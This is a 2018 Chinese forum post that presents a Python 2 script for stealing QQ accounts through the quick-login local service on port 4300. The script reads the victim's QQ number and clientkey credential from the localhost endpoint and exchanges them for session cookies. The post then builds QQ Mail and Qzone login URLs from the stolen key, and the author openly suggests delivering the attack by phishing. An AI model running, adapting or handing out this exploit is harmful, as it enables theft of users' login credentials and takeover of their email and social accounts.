本帖最后由 tsaizq 于 2018-8-30 16:11 编辑
QQ快速登录漏洞盗号 之前看过的一篇文章中讲过依据qq快速登录盗号的原理,这次用python本地的复现了一下,下面是原文章的链接:https://www.cnblogs.com/Leo_wl/p/7508646.html#top 大致的漏洞原理是,qq在本地开了一个端口,用作Web服务器,然后网页ajax向那个qq服务器发送请求,然后获取结果,通过获取的结果,然后进行登录。这个漏洞的利用基础情况是受害者必须在本地已经运行qq的情况之下,运行才能有效果。 直接上代码吧 # -*- coding: UTF-8 –*-
import requests
import re
def getkey():
com = re.compile(r'"\d*"')
url = 'http://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.8785845953581826&pt_local_tk=1'
payload = {'pt_local_token': '1'}
headers = {'referer':'https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=https://mail.qq.com/cgi-bin/login?vt=passport%26vm=wpt%26ft=loginpage%26target=&style=25&low_login=1&proxy_url=https://mail.qq.com/proxy.html&need_qr=0&hide_border=1&border_radius=0&self_regurl=http://zc.qq.com/chs/index.html?type=1&app_id=11005?t=regist&pt_feedback_link=http://support.qq.com/discuss/350_1.shtml&css=https://res.mail.qq.com/zh_CN/htmledition/style/ptlogin_input24e6b9.css'}
r = requests.post(url, cookies=payload, headers=headers)
s=r.text
s=s.encode('utf-8')
s=str(s)
ss=re.findall(com,s)
qqnum=ss[1]
print qqnum
qqnum=qqnum.replace('"','')
url1="http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin="+qqnum+"&callback=ptui_getst_CB&r=0.7293395590126179&pt_local_tk=1"
rr=requests.post(url1, cookies=payload, headers=headers)
cookies=rr.cookies.get_dict()
cookies=str(cookies).split(':')
cookies=cookies[2].replace("'",'')
cookies=cookies.replace('}','')
cookies=cookies.replace(' ','')
url2="http://ssl.ptlogin2.qq.com/jump?clientuin="+qqnum+"&keyindex=9&pt_aid=522005705&daid=4&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=1025798287&pt_3rd_aid=0&ptopt=1&style=25"
payload = {'pt_local_token':'1','clientuin':qqnum,'clientkey':cookies}
rrr=requests.post(url2, cookies=payload, headers=headers)
finnalcookies=rrr.cookies.get_dict()
print finnalcookies,cookies
getkey()
本地运行效果如下:
得到qq号和登录凭证
通过构造qq邮箱登录:
https://ssl.ptlogin2.qq.com/jump?clientuin=qq号码&clientkey=获取的凭证&keyindex=9&daid=4&pt_aid=522005705&u1=https://mail.qq.com/cgi-bin/login?vt=passport&vm=wpt&ft=ptlogin&ss=
同样的道理,可以构造qq空间登录,其他的也可以,比如web端的qq,微云等等。
https://ssl.ptlogin2.qq.com/jump?pt_clientver=5545&pt_src=1&keyindex=9&ptlang=2052&clientuin=qq号码&clientkey=获取的凭证&u1=https:%2F%2Fuser.qzone.qq.com%2Fqq号码%2Finfocenter&source=panelstar
最后总结:本人只是在本地进行了测试,当然您可以用其他的方式进行操作(钓鱼什么的你懂的)。这就取决于你啦。 希望能够加入90sec。。-_-
| 
楼主